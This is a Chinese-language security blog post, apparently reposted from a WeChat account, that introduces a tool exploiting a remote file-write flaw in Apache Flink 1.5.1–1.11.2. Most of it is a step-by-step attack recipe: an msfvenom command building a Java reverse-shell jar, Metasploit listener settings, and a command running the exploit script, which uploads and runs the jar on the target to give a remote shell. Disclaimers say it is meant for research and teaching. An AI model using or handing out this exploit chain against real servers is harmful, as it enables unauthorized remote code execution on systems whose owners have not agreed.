免责声明:
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,如有雷同和侵权请联系删除。
工具介绍
Apache Flink是一个面向数据流处理和批量数据处理的可分布式的开源计算框架。它可以用来做批处理,即处理静态的数据集、历史的数据集;也可以用来做流处理,即实时地处理一些实时数据流,实时地产生数据的结果;也可以用来做一些基于事件的应用;该漏洞允许攻击者利用REST API,并通过精心构造的HTTP Header,实现远程文件写入。影响版本:Apache Flink: 1.5.1 —— 1.11.2
安装与使用
1、首先需要使用msf生成一个jar包的攻击载荷
msfvenom -p java/shell_reverse_tcp lhost=192.168.99.5 lport=4444 -f jar > exp.jar
2、将攻击载荷exp.jar放入到python脚本的同级目录下,注:在脚本中攻击载荷的名字写死了为exp.jar,使用者若想更换可以修改源码进行更换,攻击载荷生成完成后,在msf上建立监听接受反弹的shell
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 0.0.0.0
set LPORT 4444
exploit
3、随后执行python脚本
python .apache_flink文件上传getshell.py -u http://192.168.99.7:8081
4、脚本会返回apache-flink的版本信息,若存在漏洞则会上传exp.jar包,成功上传后会返回jar包落地的文件名,并且会执行该jar包,执行完攻击载荷就可以在msf上看是否反弹了shell回来,成功反弹shell,并且可以成功执行命令。
工具下载说明:
如历史文章中工具下载地址过期,可添加vX索取
原文始发于微信公众号(TOP网络安全):文件上传漏洞工具介绍
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论